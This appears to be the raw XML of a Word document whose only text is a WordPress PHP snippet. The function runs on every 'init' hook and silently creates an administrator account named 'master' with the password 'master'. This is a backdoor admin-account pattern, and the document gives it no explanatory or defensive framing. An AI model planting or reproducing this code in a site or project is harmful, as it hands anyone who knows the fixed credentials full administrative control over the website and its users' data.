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554" w:rsidRDefault="00F86554" w:rsidP="00F86554">
      <w:r>
        <w:t>function wpb_a1admin_account(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F86554" w:rsidRDefault="00F86554" w:rsidP="00F86554">
      <w:r>
        <w:t>$user = 'master';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F86554" w:rsidRDefault="00F86554" w:rsidP="00F86554">
      <w:r>
        <w:t>$pass = 'master';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F86554" w:rsidRDefault="00F86554" w:rsidP="00F86554">
      <w:r>
        <w:t>$email = 'email@domain.com';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F86554" w:rsidRDefault="00F86554" w:rsidP="00F86554">
      <w:r>
        <w:t>if ( !username_exists( $user )  &amp;&amp; !email_exists( $email ) ) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F86554" w:rsidRDefault="00F86554" w:rsidP="00F86554">
      <w:r>
        <w:t>$user_id = wp_create_user( $user, $pass, $email );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F86554" w:rsidRDefault="00F86554" w:rsidP="00F86554">
      <w:r>
        <w:t>$user = new WP_User( $user_id );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F86554" w:rsidRDefault="00F86554" w:rsidP="00F86554">
      <w:r>
        <w:t>$user-&gt;set_role( 'administrator' );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F86554" w:rsidRDefault="00F86554" w:rsidP="00F86554">
      <w:r>
        <w:t>} }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F86554" w:rsidRDefault="00F86554" w:rsidP="00F86554">
      <w:r>
        <w:t>add_action('init','wpb_a1admin_account');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F86554" w:rsidRDefault="00F86554" w:rsidP="00F86554"/>
    <w:p w:rsidR="00F86554" w:rsidRDefault="00F86554" w:rsidP="00F86554"/>
    <w:p w:rsidR="0068628E" w:rsidRDefault="0068628E"/>
    <w:sectPr w:rsidR="0068628E" w:rsidSect="00686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6554"/>
    <w:rsid w:val="0068628E"/>
    <w:rsid w:val="00F86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Planet</dc:creator>
  <cp:lastModifiedBy>Pc Planet</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-18T13:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-18T13:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>